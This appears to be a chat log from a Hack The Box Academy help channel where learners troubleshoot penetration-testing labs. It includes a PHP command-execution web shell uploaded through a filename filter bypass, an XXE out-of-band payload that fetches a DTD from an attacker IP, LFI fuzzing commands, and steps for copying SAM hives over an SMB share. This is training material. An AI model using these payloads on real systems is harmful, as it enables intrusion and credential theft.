tried adding to original line, so i put sudo apt install freerdp2-x11 --fix-broken if thats what u meant, but did not work

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 194 not upgraded.

tried rerunning after, still no :(

try sudo apt install libfreerdp-client2-2

just because it works doesn't mean you should use it

ran this then other install freerdp2-x11 command, still same thing

i’ve gotten so used to it

It still works, yes, but it's a deprecated command, apt does the same thing

sudo apt upgrade && sudo apt install freerdp2-x11

try

oh yea probably upgrading is a good idea

make sure to take a snapshot before

running, been taking a while, will update when done

i have thank you :)

answered "y" on both of these prompts

then this

`Package freerdp2-x11 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'freerdp2-x11' has no installation candidate`

reboot try again

same response

hello can anyone guide me on the Documentation & Reporting Practice Lab the rdp so slow and i am stuck on first qst https://academy.hackthebox.com/module/162/section/1572

https://academy.hackthebox.com/module/162/section/1572

Hello! Could someone please help me out? (dm if comfortable)

If it's related to HTB Academy, it's better to just post your questions here. You'll get better and faster responses compared to asking to DM.

Actually its related to website domain names and hosting...

Do you know anyone experienced in that field?

fixed, went back to old snapshot, did these commands in this order

sudo apt-get install aptitude
sudo aptitude install freerdp2-x11

said no to first prompt - "Keep the following packages at their current version: 1) freerdp2-x11 [Not Installed]"

said yes to the second prompt - "The following packages will be DOWNGRADED:
libfreerdp-client2-2 libfreerdp2-2 libwinpr2-2
The following NEW packages will be installed:
freerdp2-x11"

thanks to year old reddit thread :) and also u guys for helping

You can verify your account via #welcome and #rules to then get access to the proper channels 🙂

Ohh okay thank you!

@misty currentcan i dm u for Documentation & Reporting Practice Lab first qst ?

why'd you need aptitude to get it working properly weird

if you've made it to doc & reporting you shouldn't need help doing the lab... you can get DA almost rightaway. and if you want to take the cpts exam, do it without asking for help, for your own good

awesome

hello guys, I'm stuck in Attacking Common Services - Easy, I've got the account and password, and uploaded shell.php in ftp, but trying to execute curl in kali to get the command execution doesn't work, please give me some advices

there’s a mysql server running on that host

You're right, I'll try it now

<@&861185840277487616>

Hi guys, I am doing crackmapexec skill assessment question 1 and did not get the password anywhere. I have tested common creds, user as pass that I found by rid bruteforce, pass spray against local and domain. So far no success, can anyone help me to addrress what I am missing here. NOTE: I have checked the hint and followed all tought on the module and also tested guest account.

Is lab exercise guidance only for silver annual subscribers or does it apply to silver monthly too?

spam

This only applies to the annual subscription

is there a more straight-forward of saving a module to my to do list than browsing all modules and then looking for the specific module?

I can't find any "save to my to do list" button when browsing a module, or am I blind?

Can anyone tell me how to connect to the docker host of the PWN Challanges

Identify the following hash: $S$D34783772bRXEx1aCsvY.bqgaaSu75XmVlKrW9Du8IQlvxHlmzLc

Using hashid you get Drupal7

What kind of format does the answer need to be ?

Tried Drupal Drupal7 Drupal v7.x

Enter exactly what hashid gives you as the answer

Drupal > v7.x

Still doesnt work

How to connect to the Docker Host for PWN Challenges ??

Better ask in #challenges

If you have no access, read and follow #welcome

ok thanks

Make sure you have no spaces at the beginning or end of the string

Refreshed the page and worked, anyway thank you

can anyone help give me a nudge with the skills assessment in using crackmapexec 3rd question

When I do: sudo smbserver.py -smb2support share1 /home/legomyegp/CPTS/ and I try to connect to the share I get this:

This is from "LLMNR/NBT-NS Poisoning - from Windows" on the Active Directory Enum. and Attacks module

I've solved it before, I'm just trying to get the smb share working so I can copy the tools over for the exam.

You can just attach a drive using /drive in the xfreerdp to download the tools over to your machine.

Please can anyone nudge me in the right direction. Cannot get credentials to DEV01.

Using Crackmapexec module skills assessment

Also, you can't get the file transfer using SMB shares because there are security policies which blocks unauthenticated guest access (no username password).
You can either modify the registry key or set credentialed access to your SMB server to overcome this.

@misty current wow thx for your help

Hello, I apologize in advance for not posting this question in the relevant channel (I don't know which one is it). In module Linux Privilege Escalation the button Mark Complete & Next doesn't appear to work. Sometimes I get an error, sometimes I get moved to the next section. When going back to the previous section, I still see the button (which means the section is not completed, so the button does not work).I've tried both Chrome and Firefox.

It's normal, it doesn't go away. If you get a green tick in the Table of contents (Should be to your right side) next to your section, then it's completed.

Oh, ok. Sorry for the dumb question.

when i'm using out of band ssrf my netcat session doesn't respond to the request i'm sending. Could this be an error in the encoded payload? The website i'm posting a html file on is timing out. Not sure what i'm doing wrong. Anyone able to assist?

https://github.com/openwall/john

Been trying to find zip2john for an ex in Hashcat

All i end finding is zip2john.c

Anyone now where i can find the python version ?

Or how to use the c version ?

Should i send this to #858470491676737536 maybe ?

...of course i configured it and used make

got some other tools in /run but not the zip2john.py

/usr/sbin/zip2john, thats where mine is but i got kali full install

do: whereis zip2john on console

returns zipjohn:

I guess that is nothing

hmm it shoud comes with john, so sudo apt update; sudo apt install john

tried that but also didnt end well, gpt said that zip2john is included in the community version

deleted the folder and installed jumbo version i can a symlink i guess zip2john -> john in the /run folder i guess this is it now

./zip2john ../../hashcat.7z
Did not find End Of Central Directory.

I guess it is working, got myself a new error haha

errors are good

For christ shake anyone knows what this is ? It says file is corrupt but can't be

Question about using metasploit to brute smb. I have this output but there is no way all of those are correct. Why does it do this and is it an indication of something I have done wrong?

Password Attacks Lab - Medium

auxiliary/scanner/smb/smb_login and using the provided uernames and password lists

this one was an interesting one tbh

iirc you had to add a flag to the cme command

ok ty, will look there

Hello, I have a problem with exercice, I export my TGT but it is not visible and that doesn't work

/opt/7z2john/7z2john.py hashcat.7z /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
File "/opt/7z2john/7z2john.py", line 786
print "%s:$7z$0$%s$%s$%s$%s$%s$%s$%s$%s$%s" % (fname,
^

What can i possibly do here ?

I see a typo KRB5CVCNAME, it's KRB5CCNAME

found the issue.... I should know better lol. SHould have tried that first

Would be better to paste the error output. But, it looks like a python version issue, try using python2 instead of python3.

I get the same error

@misty current

python is not the same as python2, your global python environment might be set to python3 when you execute just python.

You should have python2 or python2.7

You can try that.

the rockyou txt is the mistake

I am trying to export the hash not crack it

thnak you thaugh

deadly.com haha

thx

https://academy.hackthebox.com/achievement/badge/2f0b2b5a-91f5-11ee-bfb6-bea50ffe6cb4

https://academy.hackthebox.com/achievement/badge/2f0b2b5a-91f5-11ee-bfb6-bea50ffe6cb4

Now that you mention it, the passed parameter is messed up, I missed that. So that's what it was spitting the error about?

Yess ssry thank you for your time though

why are you passing a wordlist to zip2john?

Because my brain shortcircuited for a moment

Trying to crack a .hccapx file keep getting these any ideas ?

The file was create using hashcat utils ./cap2hccapx.bin ../../corp_question1-01.cap ../../to_crack.hccapx

Tried both modes 22000 and 22001 cant se other modes used for hccapx files in the hascat wiki

oh yes thanks but for this, I'm having trouble getting the flag

hey if anyone’s free could i get some help on the “Threat Hunting & Hunting with Elastic”

i’m just having some issues with the KQL command on the skills assessment and finding the popular hacking tool on the “Hunting for Stuxbot” minimodule

What does klist show?

Hi. Started my Academy journey very recently. Need some clarification regarding the difference between Rules of Engagement Document and the Contract (Scope of Work). They almost feel like the same thing. Hoped that someone with real life experience might help. Any Thoughts?

Hey, I am stuck on the question in the Abusing HTTP Misconfiguration Password Reset Poisoning https://academy.hackthebox.com/module/189/section/2014
I can already see the RenderableItem like: RenderableItem=%2Fshow%2F11%2Ftbknixctmh7pzhxj1kgfuw15rtbc2znm
However, I can't browse the it using:

http://IP:PORT/show/11/tbknixctmh7pzhxj1kgfuw15rtbc2znm

Any hint would really appreciate

Remember you're looking for a machine ticket, not a user ticket. It's represented as a keytab file. The location you need to get it is not in /tmp.

i dont get the point of 'Thick Client Applications'

randomly it starts using x64dbg

without prior introduction

I don't really understand it very well, so I have to mount it on the machine in question?

Rules of Engagement is (in general) what tools and what you can do on compromised targets. the Contract/Scope of work will have the RoE in them, but will also outline what is expected from the Penetration Test, aka what you should be putting in your report

In a way, when you find the .keytab file, you can mount it and use it to gain further access.

Revise about the keytab section again.

oh yes I see now , indeed

thanks you

had to look at some hints for Password Attacks Lab - Medium, how was I supposed to know to use that one users key to then use it on the final user? I hope am not to vague but I am trying to avoid spoilers

I would have never thought to try to ssh with that final user

Think in the first place: why is it pw protected

Got it. Thank you. I was confused because the module showed similar elements in the checklist for each one, and wondered whether it required a special status and not a part of the Scope of Work implicitly.

just gonna have to change the way my brain thinks about things

Because some things do overlap

hey guys
on "AD Skills Assessment - Part I"

I got problem with the upload function in Antak (want to put do tunneling with ligolo but for some reason it does not allow to upload the exe) (trying to pivot to MS01)
can someone please help?

DOCUMENTATION & REPORTING - Notetaking & Organization
(TMUX)
Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him?
(Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)

The answer would be
ctrl + b + %

but following the format it would be
[Ctrl] + [b] + [%]

Both answers are wrong -_- what is the correct format? xD

the way you write it is if you have to press the 3 keys together

@steel dawn its CTRL + B and after release those and press %

Just consider ctrl+b as one key when it comes to tmux.

can I dm someone for sanity check on intital foothold on Password Attacks Lab - Hard? Im pretty sure im dong the right thing but its taking so long

meh, in the module they say,
" Once in the session type [Ctrl] + [B] + [Shift] + [%] (prefix + [Shift] + [%]) to split the panes vertically (replace the [%] with ["] to do a horizontal split)"

So my guess is [Ctrl] + [B] + [Shift] + [%]
But that's not the answer xDD Damn this module

Make sure you're not leaving any whitespaces at the beginning or the end.

Also, wrap up your text with spoilers tags.

where are you stuck?

well, there is not any correct answers so dunno if thats spoiler xD

Waiting on ||crackmapexec smb <IP> -u johanna -p mut_password.list --shares|| to find a pw, just want to be sure I am doing the correct thing for inital creds because it has been going for a long time

you’re doing the correct thing

@steel dawn You got the answer, prolly some silly character messing with you.

idk if the username is case sensitive

good point, I assumed lowercase because it usually is. I guess ill give this another hour and restart with lowercase if I dont find it

it's windows, it's not case sensitive, you need the --local-auth flag

you’re on the right track using the ||mutated passwords list|| maybe try bruteforcing another protocol

you don't need another protocol either

worked with rdp

sure, but that's not the issue here

I think its just a time thing

have to wait longer

rdp will be slower, yes

Try crowbar

Thats for RDP right? Im attacking SMB

Oh sry thought you was attacking rdp

hydra supports rdp now anyways

guess I should stop sitting here and watching it lol. Maybe see what outdoors looks like.

Good evening guys, I have a tiny question. Ive got user on this box on the metasploit module. Now I have to use priv esc on the box and I know which exploit I have to use but I just cannot geet a session to pop.. Could anyone tell me what Im missing here?

Module: File Upload Attacks
Whitelist filters

I've tried both methods and neither of them is working. One of them (Double Extension OR Reverse Double Extension) uploads my script but then the script itself is not accessible, and the second method (Character Injection) is just not working at all. I've done File Upload Attacks in the wild and this is really odd. Help?

Update: Got the shell to upload but it's not printing the results of my query. Any help is greatly appreciated

Can I see what you uploaded?

For sure! You want the request right?

yup

Content-Disposition: form-data; name="uploadFile"; filename="shell.phps.\.jpg"
Content-Type: image/jpeg

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>

I've also tried the same with the simplest shell I could do, same thing - it gets uploaded correctly, is visibly there but doesn't return anything.

One second. Testing something.

For sure, appreciated.

Also I don't think you were mod last time I saw you, congrats!

could anyone help with the privesc in the Metasploit Framework module, sessions & jobs

I dont think so, Thank you.

Is this a ok place to ask general questions.

I'm wondering does htb give certs.
Are they worth anything for job.

As I have skills but 0 currently active cert.

And ether where I worked is gone cuz covid shut down or nda so my resume sparce

Mind if I dm you?

go ahead

I keep getting "no session was created" for every privesc payload I try on baron samedit

ask in #cpts

Which section

okay

He was responding to someone else

Are you sure all parameters are correct, if you're on jump host (an box in the middle) are you using the right LHOST

"Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer. "

I am not sure how to get to the home page. I tried using the gobuster tool to find out the directories for the home page but that didn't help.

https://academy.hackthebox.com/module/158/section/1434

It is the default Apache page. You shouldn't need to go anywhere else but type in the ip.

on the webaddress bar?

When you launch firefox using the proxy, you typed in the address. The flag is on the page that comes up.

Look at the top of that page.

Im sorry I just see the webpage title and I tried submitting that as an answer

Did you read the page? Especially the text within the red bar?

how do you locate the Build number of target windows

Run systeminfo

what module is that?

Is there a way to get this popup back after closing it?

if you click on the machine, and scroll down, it should have a "share results"

This is the bottom of the machine, it doesnt show the share button there. @languid fjord

interesting, Dancing is starting point, correct?

Might be different on starting point - let me look into it

Yes. That’s in starting point.

It’s ok if you cant find it. I was able to save the link I had copied. ☺️

go to your htb profile, on the top right there's a share profile button, click that to copy, you'll need your profile ID, the number after the last /, then put it in the link below
https://www.hackthebox.com/achievement/machine/<YOUR ID>/395

oh wait you've got the link copied already

Yes, I got it. But this is helpful to know either way. Thanks 🙂

I am unable to exploit done every thing

it's definitely vulnerable

Does anyone know why can't rdp the lab in ACTIVE DIRECTORY ENUMERATION & ATTACKS module?

wrap password in single quotes?

does the section say to rdp

yes
Otherwise like this:

press enter

!

oh

believe it or not you're not the first person to be caught by that

Thank you. I think it broken

you're not the only one that's thought that

Thanks a lot.

you can probably use discord search feature to look for the issue

Hi, sorry if I have a question about HTB Machines where should I ask?

#boxes if you read #welcome you'll find out how to access more of the server

Hello! I'm a beginner and confused about what module I should learn after the "Intro To Academy". Is there any guideline on what I should take after that? Thank you!

Information Security Fundamental Skill Path

Thanks

Thank you so much! Besides, I'd also like to ask if HTB Academy is good for beginners.

It's pretty good for beginners as it explains a lot of the stuff

some of it requires some external research

but for the most part the theory is well explained

if you want an extremely hand holding experience THM is better for that

but you're not going to run into too many situations where the way to achieve the answer isn't in the module itself

Thanks for your response! I'll try to check for THM!

THM is TryHackMe it's a different site

in case you werern't aware

can you tell me what is unique path? is it the urls in the source code?
how to I fetch it. With regular expressions?

Hello everyone im in assembly language module skills assesment part 2, im trying to get the flag for 4 days but im stuck and i dont know how to do it, could somebody help me?

as i replied in your post: figure it out

I am on this for maybe 1 hour. Cant find the solution

1 the answer is gonna be a big number (less than 100) and 2 the section is about filtering

so you'll probably need to filter via regex stuff

curl -s https://www.inlanefreight.com/ | grep -E 'https://www.inlanefreight.com/\S+' | sort -u | wc -l

shows 0

My logic was to filter grep and add everything until a space is encountered

hello could somebody help me with assembly module skills assement, please?

if you're looking for paths, why are you filtering for spaces?

you also don't need to double up the / and just grep for inlanefreight.com

if you're curious about why a result is x, always step back your answer

and see why you're only getting x result

I mean When I am looking for path then It has to be https://www.inlanefreight.com/something.... like this. so I was thinking I would filter like that it will filter those that will be https://www.inlanefreight.com/+++= until it encounters a space as path cant have space in between

you really don't need to regex it; you can just look for instances of inlanefreight.com

as they'll often be followed by the path; then you sort unique; then wc

is the answer 33?

it shows incorrect

close

The sql injection isn’t clicking for me. Is there any indication my injection is doing anything besides the final login

@fathom pendant can I inbox you?

no

hey could somebody help me with assembly language module? im stack in the last question for 4 days

Hi there !
Could I request the help of someone ?
ZAP HUD doesn't work on my instance. I can't launch any scan from there.
Does someone know how I can fix this ?
I already updated Zaproxy but it didn't change anything.

strange

spend 2 days on Blind SSRF Exploitation Example module trying to get stuff to work with my own kali install, turns out if i use pwnbox it just works, while my own machine times out trying to communicate with servers

oh well it was good practice lol

hello for windows module i find the version but my anwser don't match

They even gave you an example in that question

i find thx

I have not done this module but did you scan UDP as well?

Hello, do you have any idea why in the module AD / Internal Password Spraying - from Linux, none of the commands are working? I validated manually with rpcclient the user, but even the bash command is not working.

Oh yeah , DNS is a udp port

DNS uses UDP and TCP

so why wouldn't the dns port show up when I just do a regular Nmap scan

That depends on what is open.
A normal DNS query normally runs via UDP
A zone transfer, on the other hand, requires TCP.

what do you mean they are not working? You have a screenshot to better explain? You can an error or something? You are not getting hits? Be more specific so they can help you

I've found the problem, there some hidden characters in the list.

great

wdym can't use LS/DIR all you're showing btw is using crackmap; also you're spoiling the password and user

keschler@Anonymous:~/Downloads$ smbclient -U john \\10.129.127.46\CASSIE
Password for [WORKGROUP\john]:
Try "help" to get a list of possible commands.
smb: > ks
ks: command not found
smb: > ls
NT_STATUS_ACCESS_DENIED listing *
smb: >

you can redact with -user -pass

also wrap your command stuff in triple backticks

What do you mean with that?

that way if something like character escaping happens (\ escapes characters) then it shows up properly

replace the USERNAME and PASSWORD that you're showing with just the words user pass

also I don't recall if that password is that plaintext

i thought it was more involved but i could be wrong

been a minute

You mean like that?

SMB         10.129.127.46   445    WINSRV           [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB         10.129.127.46   445    WINSRV           [-] WINSRV\user:pass STATUS_LOGON_FAILURE 

I meant when you're sharing what you've tried

ok 😅 xD

the alternative is using first initial and * (I.e. j*)

So how do I find it out?

idk you should be able to use dir on it

¯_(ツ)_/¯

Module: Using CrackMapExec
Section: Mapping and Enumeration with SMB
Question: Enumerate all computers and identify the one missing in the section example. Submit the computer name as the answer (include the symbol $).

This doesn't appear to work the way it's shown in the example. Running this in the lab comes back blank. Any suggestions?

but idk if your password is actually correct

It is

don't have my notes on me to verify the correct password

still spoiling the answer

? It is not the answer

i forget if it's -windows-auth or -local-auth for cme

how can i uplaod screenshots

but use that to verify

I don't understand

you need to verify your main htb account following instructions in #welcome

Hello! i got stuck with this one question in Active Directory Enumeration & Attacks ACL enumeration

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) "

those flags tell smb that the combination you're looking for is a windows login

i found the usernode in bloodhound but cant find the answer

I take it you got the Bloodhound/Sharphound answer and it's not accepted yeah? (That's because the bloodhound name isn't the Object Ace Type

I am not looking for a windows login?

SMB

it's generally windows

probably

But in the module, you are supposed to just connect using smbclient.

yes

SMB is generally on a Windows host

you can connect with a Linux client

Ok, and when I connect to it via smbclient how can I find the flag?

should be able to find it using dir

like i said if you do the password attack with (I think) --windows-auth

But as I said dir is not possible

it should eliminate false positives

where would I need to specify --windows-auth

with CME

--local-auth.

thanks I get it mixed up with a few other commands

But that gives the same result

So I dont see the diffrence

¯_(ツ)_/¯

what module and section is this?

Password Attack and Network Services

so what is?

that's what you gotta figure out :) https://blog.backslasher.net/active-directory-object-specific-aces.html

thank you

j* isn't the user for SMB

But why did hydra say success for j*

Doesn't matter I've found it using a different method...though the smb --computers method doesn't work as it says in the module...

cant identifiy myself with tokken -- error #bot-commands

because he's still a valid user for the windows machine; you can do --continue-on-success

btw @earnest zenith if you want a smaller list, on the previous ones you can create a shorter username list by checking the C:\users\ directory

Found it out thx

Module: Web Attacks Section: Blind Data Exfiltration -- <!DOCTYPE email [ <!ENTITY % remote SYSTEM "http://10.10.16.30:8000/xxe.dtd"> %remote; %oob; ]> Doesnt hit my php server on port 8000 -- why? any suggestions

php -S 0.0.0.0:8000

Got it -- had a typo

Hi there - have been bashing my head against this module / question all day: Broken Authentication - Brute Forcing Usernames - Question 2

I've used Burp Suite and **wfuff **trying to figure this out. The username answer to the first question appears in multiple wordlists, the top-usernames-shortlist.txt and xato-net-10-million-usernames.txt

I'm aware that the hidden inputs in the form are populated on response and have tried various strings to check, among other things, teh values of those fields, the use of Remember me and who knows what else at this point. Any guidance or hints would be very welcome because running through another hour each time to try something new isn't conducive to progress.

The screenshot bit in the LDAP and RDP Enumeration section doesn't work either for anyone who comes across it...

Hi guys,

I am doing the module using crackmapexec skills assessment.

And I am stuck on the 3rd question. I have got 5 credentials J******, A***, S*****, A*************, SQ*****

I need to get on the DEV01 device but no route.

I am getting an error when I try to take screenshots of the users screen.

Hello, I have a problem on module Shell & Payloads on section Laudanum, One Webshell to Rule Them All.
I have my webshell, but when I write the path where I am, but nothing is good.
Can someone help me about answer ?

It's asking for the absolute path in the pwnbox

Iirc it includes the webshell name

Hey all! I'm wondering if I've got an issue with RDP on the Pass the Ticket from Windows section of Password Attacks. I'm trrying to authenticate with the provided credentials in the initial positioning portion of the lab, and I'm getting an NTSTATUS_LOGON_FAILURE. Has this happened to anyone before who can shed some light on a solution? I'm glad to try bruting again... 👀

Hey! Just in case people wonder in the future, I had not escaped some chars in the password and bash interpreted them before the RDP program did. Escaped with backslashes and works fine. Thanks anyways!

The problem is the other answer, the directory you land in

Symlinks are fun

Hi all, I have questions about Linux Container(learned from LXD in module : Linux Escalation)
Q1:
For example, I wrote my current shell process id to the file /sys/fs/cgroup/pids/test/tasks
then the output of the command
$(cat /sys/fs/cgroup/pids/test/tasks 1>&2 )
showed three process id. Why?

Q2:
then I set the pids.max file to 2
why when I typed again
$(cat /sys/fs/cgroup/pids/test/tasks 1>&2 )
the output was
-bash: fork: retry: No child processes

(note for Q 1:
I have done some searches and the found the answer is subshell, cat's process id, and the one that i wrote into the file. But still, I don't really get it what do subshell mean in this command)
(note for Q 2:
the pids.max file controls the number of process that can run. Is this correct?)

module: file upload attacks, whitelistfilters. question: I managed to upload a few shells with difficult chars in them. how can I open these shells from a webbrowser or should i use curl? ||shell.phtml/.jpg||

Hello everyone. I'm stuck in the last 2 questions of AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

I have the credentials of the user with GenericAll user and I try to ACL abuse

Can anyone to help me?

you got the answer wrong btw

I know, just found out i can open it through server:port/profile_images/.jpg

awesome

Can anyone give me a hand wioth attacking lsass - file transferring? I was trying this here : sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

C:> move sam.save \10.10.15.16\CompData

but i get the exception / denied error and it seems like the drive won't mount/create either

anyone!

I think your user is not called ltnbob 😉

@acoustic owl i changed it, but it isn't working lol..it keeps running in terminal and never created the share on attacker machine

this is what i am running to try and create the share:|| python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support Lsass /home/htb-ac-814020/lsass1||..it never creates it...then for some reason when using net use \IP\Lsass it completes fin...just odd but I cannot get to it and nothing exists on my end as the attacker because it never gets created...i just get this

Hi I'm kind of failing on "Find and submit the contents of the TXT record as the answer." from "Active Subdomain Enumeration"
I've been going through some discord history + I'm a DNS noobie so I'm stuck but trying to learn a bit more 😛
I found the subdomains and I've used || dig txt internal.inlanefreight.htb @rustic sage || but nothing shows up (saw that I needed to try out || internal || as a hint in here. But still comes up blank. I could use a hint, what am I doing wrong? 😄

you might be querying the wrong ip

why 127.0.0.1 ?

NVM - figured it out

it came back like that from the dig axfr 😮

use the ip address you were given for that section instead

🤦‍♂️ yes got the flag XD thanks!

Can't believe I was so blind, dns is not rlly my thing haha

Is there any system outtages? My openvpn connection to Starting Point keeps getting dropped.

Im going to try and restart and see if that works

i dont think so

Let me check kali

Trying that now. Thanks

working for me

always double check for multiple openvpn sessions and that youre not running pwnbox at the same time

mult openvpn sessions even sabotaged me on oscp lol

No pwnbox. It connected again. Let me see if it lets me ping this machine.

No replies. It keeps getting stuck there.

was ping working before? sometimes boxes just don't respond to ping.

This is what it says. This time Im connected to the openvpn.

Hello there, does anyone have any ideas on how to exploit Samba SMB 3.0.14a specifically? I am struggling with it and I would like to bounce back some ideas to see where I am lacking knowledge. Thanks! 😄

which module are you doing?

lol you are connected to the vpn, the address is just blocking your request. You need to try to do a syn or fin scan because that scan you are doing is being blocked by the firewall.

try to do sudo nmap -sS <address>

It's a bit weird on my case, it's from my university's course... my teacher mixed up a few HTB machine vulnerabilities and they need solving (don't really know which ones specifically for obvious reasons.. 😅 ) I'd understand if y'all can't help if it isn't a specific HTB module......

yeah you just need to read #welcome to verify your account and access the rest of the server, then you can find a more appropriate channel to ask

Sounds perfect. 👍

I assume my question would go to offtopic ... ?

Did anyone acutally managed to solve the "password attacks" in 8 hours? 8 Hours seems like a big stretch for me 😄

oh god.. im at PTT Linux and i am in for a week already on the password attacks module

module: file upload attacks, whitelistfilters. question: I managed to finaly get the solution, use burp instead of zap. now the question is, what is the difference between burp and zap that I managed to get a result with intruder using the same wordlist as in zap. setting used in burp was switch off url encode, but i did not encode in zap. I hope some can explain me 😄

Can someone assist with why Lazagne is auto closing after running it for the credential hunting in windows section?

How do you open and run lazagne?

@acoustic owl i copied from my host to windows with copy/paste for xfreerdp, then i go into PS which i run as admin and then do start lazagne.exe all

and it runs, but then closes right after

show your term output

Run it with cmd.exe, not in PS

@acoustic owl ok let me try that

lazagne runs in both

doesnt matter which

@acoustic owl same thing happens

share your terminal output

so i ran the troubleshooter and it seems to have fixed it - may be some compatibility issues

¯_(ツ)_/¯

You wont share your terminal output so who knows

If you open a console and enter ./lazagne.exe all, the console will not close, right?

But if you enter start lazagne.exe all, PS opens another cmd console, runs lazagne and closes the window again.
I thought this doesn't happen under cmd, but apparently it also happens under cmd.exe

I dont think Ive ever ran a tool inside PS by prefixing with start

We can speculate what could be happening all day but if they wont share what theyre actually doing its pointless

im on the password attack module in the proteceted file section anybody knows the password to kira?

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

You have already cracked the password in a previous section.

RDP instance keeps dropping from within the pwnbox instance? connection timing out on the RDP client, per the error log

for clarity, the RDP instance was freshly spawned with over 60 minutes remaining. Also after 10 minutes I am able to reconnect to the RDP instance with persistent state - so the VM instance isn't dying, but the tunnel...

Attacking Common Applications

I don't know why everytime I run this proxychain command , it shows the rdp port as closed ...but In the module example, the rdp port is open.
https://academy.hackthebox.com/module/158/section/1438

"Using the concepts taught thus far, connect to the target and establish an ICMP tunnel. Pivot to the DC (172.16.5.19, victor:pass@123) and submit the contents of C:\Users\victor\Downloads\flag.txt as the answer. "

I attempted this module multiple times

its showing closed for timing out, you sure your tunnel is working

I thought so...

Login form attacks
I’m having a bit of trouble , anyone know why it says that the rockyou.txt file is not found but when I use locate it find it -thanks in advance

do you have permissions to read the file?

Yea , I just don’t understand why the first command doesn’t open it literally the only thing I have left to go on to the flag

cat the rockyou.txt once, just to confirm that it actually exists. The locate command says that it's database is outdated and might be showing an old mapping of the rockyou.txt.

You are right I cant use cat it says the file doesn’t exist I was just trusting that the Pwnbox would have it

iirc, the second path from the locate output might be the valid one.

Guess not lol

PwnBox should have one tho. Refresh the locatedb and try to locate it again

Im a noob, but dont you have to use “get” and then “cat”?

wasnt able to finish tonight will try again tomorrow its late for me goodnight

Nah, you don't have to.

Would be great if someone could look at this please

Hello everyone i need help with assembly language module can someone help me please?

For this module, should I changed the IP address to the IP address of the attack machine? I am thrown off by the IP used in the example in the module.

https://academy.hackthebox.com/module/158/section/1438

For anyone else stuck on this one, you don't need any fancy super-long wordlists, but also the string you're checking for might be well out, plus also the number of characters in the response aren't going to be that different. Basically, ||one of the fields changes it's name||.

So I went back to following the example in the module because I could not ssh'ed into the local host ...But I don't now why the packets are now dropping.

hello everyone, I am on the LIVE ENGAGEMENT part from the module Shells & Payloads and am currently doing the first machine host-1. I was able to connect to the attack box, I saw the cred-access.txt file, I was able to open the tomcat webserver on a browser and connect, and I am able to upload .war files on it, to deploy them and see them being live on the /manager directory.
I tried two things to gain a shell:

• craft the payload java/jsp_shell_reverse_tcp with msfvenom
• have metasploit do everything using the payload java/meterpreter/reverse_tcp

both of those approaches are described in this website that I found: https://vk9-sec.com/apache-tomcat-manager-war-reverse-shell/
I do pay attention to use the ip of the attack box and to use the correct ports.
My problem is that for metasploit I get this error:
[-] Exploit aborted due to failure: unknown: Failed to execute the payload
And when I try without metasploit, I run "nc -lvnp 243" deploy the payload on the website and click on it but I never get anything on cli, even after the page has fully loaded.

I would appreciate any help !

Send me a DM and I will help you man

try using a different port number

I used different port numbers, I've used 243, 9999, 4444 and maybe even others that I don't remember, I've done it so many times

strange

use regex match, you selected literal string

if that method doesn’t work on your machine there’s another method

yes 👍

nothing changes ^^""

that's because you typed the regex pattern wrong

^User-Agent*$

try

there's a period in the regex pattern

cmon guys, it's not hard to read and copy from the example...

@next bronze there’s no period in this regen pattern 🤔

I meant in the correct pattern

here

the pattern is good

In Regex

but no change situation

there’s a period(.) before ^$

yes now it is okay thanks

https://tenor.com/view/this-is-fine-this-is-fine-dog-this-is-fine-meme-this-is-fine-pepe-this-is-fine-pepe-the-frog-gif-11023810198288410454

Me right now

Hi, I'm doing "Firewall and IDS/IPS Evasion - Medium Lab". nmap reports some info as DNS server version, which isn't accepted as the response. Am I correct, that I should find numeric version of the DNS server?

the dns server version for that section is a flag

The same format as usual HTB{...} ?

yes

Thanks, will check.

Hi, you managed to figure out the reason for this error, I have the same thing.
Although I copy the certificate key one by one.

can someone give me a tip for the Automated Scanners flag from the File Inclusion module

With a standard ffuf scan i was able to discover that the parameter ?view can be used
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://94.237.48.48:58377?FUZZ=value' -fs 2287 | grep -v 2309

Followed by finding matching exploits with
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.48.48:58377/index.php?view=FUZZ' -fs 2287 | grep -v 515

But now I can't seen to figure out how to read the flag at /flag.txt
Log Poisoning is not posilbe I can't find any access or error logs
File upload is not possible because there is no option to upload
PHP Wrappers I can't seem to find the configuration file to check if any filters are enabled

Help would be appreciated

This issue was faced by an individual lately. Restarting the machine solved the issue is what he says -> #modules message

Hello, is there a hacker here?

Hello, This channel is for help with academy modules only. Thank you. Please as well read #rules and #welcome.

Again, I know that stupid questions can be annoying but I'm just looking for additional information on the modules and obviously this is the channel for it. I tested with Zap but the regex option cannot be activated, what should I do to access it?

?view=/../../../../../../FUZZ

try

maybe try checking the box

https://tenor.com/view/patrick-star-dumb-gif-8695905060413370166

....

If I ask the question it’s because it’s not working

You know what section?

In the same module, a couple of sections back

Thanks, it worked, but I can guess what else could be the reason (because I've tried it more than once before).
It is necessary to run PS under the rights of the logged-in user (bob), and not under the administrator.

Is it normal for Get-DomainObjectACL from Powerview to take a lot of time to execute? I started 15 min ago and it's still running. And it's not blocked...

